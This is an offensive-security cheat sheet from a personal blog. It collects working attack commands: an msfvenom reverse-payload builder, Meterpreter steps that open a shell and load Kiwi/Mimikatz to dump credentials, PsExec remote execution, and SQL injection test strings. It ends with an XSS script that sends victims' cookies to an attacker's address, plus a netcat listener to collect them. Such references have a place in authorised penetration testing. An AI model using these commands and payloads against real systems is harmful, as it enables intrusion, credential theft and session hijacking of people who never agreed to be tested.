Menu

|>wn |>alace

EnkOdes Personal Security Blog

Commands

Metasploit

  • Create standalone payload via MSFVenom 
    • # msfvenom -p [payload] LHOST=[attack_machine] LPORT=[attack_port] -f [file_extension] > [path_to_file+ext]

Meterpreter

  • Invoke shell
    • meterpreter > execute -f cmd.exe -c
    • meterpreter > channel -I [#]
  • Load primary and extended functionality
    • meterpreter > load stdapi
    • meterpreter > load extapi
  • Load Mimikatz or Kiwi (for dumping credentials in memory)
    • meterpreter > load kiwi
    • meterpreter > load mimikatz
  • Launch executable
    • execute -f [program.exe] -c

Powershell Empire

PSEXEC

  • Launch PSEXEC against a remote target
    • C:\> psexec \\[targetIP] [-d] [-u user] [-p password] [command]

SQL Injection

  • Testing for SQL Injection using TRUE statements
    • ' ' or 1=1
    • " or 1=1
    • ' or 'a'='a
    • ') or ('a'='a

Cross Site Scripting (XSS)

  • Reflected
  • Stored
  • DOM
  • Using Netcat to grab cookies
    • Set up listener on attacker machine
      • nc -l -n -p [port_num]
    • Embed script on target site
      • <script>document.location='http://[your_address]:[PN]/grab.cgi?'+document.cookie;</script>